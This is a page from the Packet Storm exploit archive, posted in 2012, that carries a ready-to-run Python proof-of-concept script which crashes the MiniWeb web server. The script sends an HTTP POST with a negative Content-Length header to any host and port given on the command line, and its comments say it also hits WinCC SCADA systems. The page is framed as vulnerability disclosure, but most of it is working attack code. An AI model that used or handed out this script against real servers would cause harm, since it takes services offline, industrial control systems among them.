what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MiniWeb Content-Length Denial Of Service

MiniWeb Content-Length Denial Of Service
Posted Jun 1, 2012
Authored by infodox

MiniWeb Content-Length denial of service proof of concept exploit. Original vulnerability discovered by Luigi Auriemma.

tags | exploit, denial of service, proof of concept
SHA-256 | f68adef9522b7ceb14448112ea32e0abd2f8d6621850e2a8a61eb0f2110c61a2

MiniWeb Content-Length Denial Of Service

Change Mirror Download
#!/usr/bin/env python
# miniweb Content-Length DoS PoC
# Not a 0day, sadly.
# aluigi found this ages back, I independantly rediscovered it fuzzing
# and noticed it was still unpatched. Oh well, better disclose so!
# vuln version at code.google.com/p/miniweb/
# affects WinCC also :) (Oh, them SCADA...)
# Massive props to ohdae for helping with this!
# insecurety.net | bindshell.it.cx
import sys
import socket

def banner():
print """
MiniWeb Killer - Kills MiniWeb
-Insecurety Research
-Bindshell Labs
"""

if len(sys.argv) != 3:
banner()
print "Usage: ./MiniDoS.py <host> <port>"
sys.exit(1)

banner()
target = sys.argv[1]
port = sys.argv[2]

evil = "POST / HTTP/1.1\r\n"
evil += "Host: %s\r\n" %(target)
evil += "User-Agent: MiniWeb Killer ^-^\r\n"
evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
try:
expl.connect((target, int(port)))
print "[+] Connected, firing das payload!"
except:
print "[-] Connection Failed... Is there even a target?"
sys.exit(1)
try:
expl.send(evil)
print "[+] Payload Sent!"
except:
print "[-] Payload Sending Failure... WTF?"
sys.exit(1)
expl.close()
print "[*] Should be dead..."
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close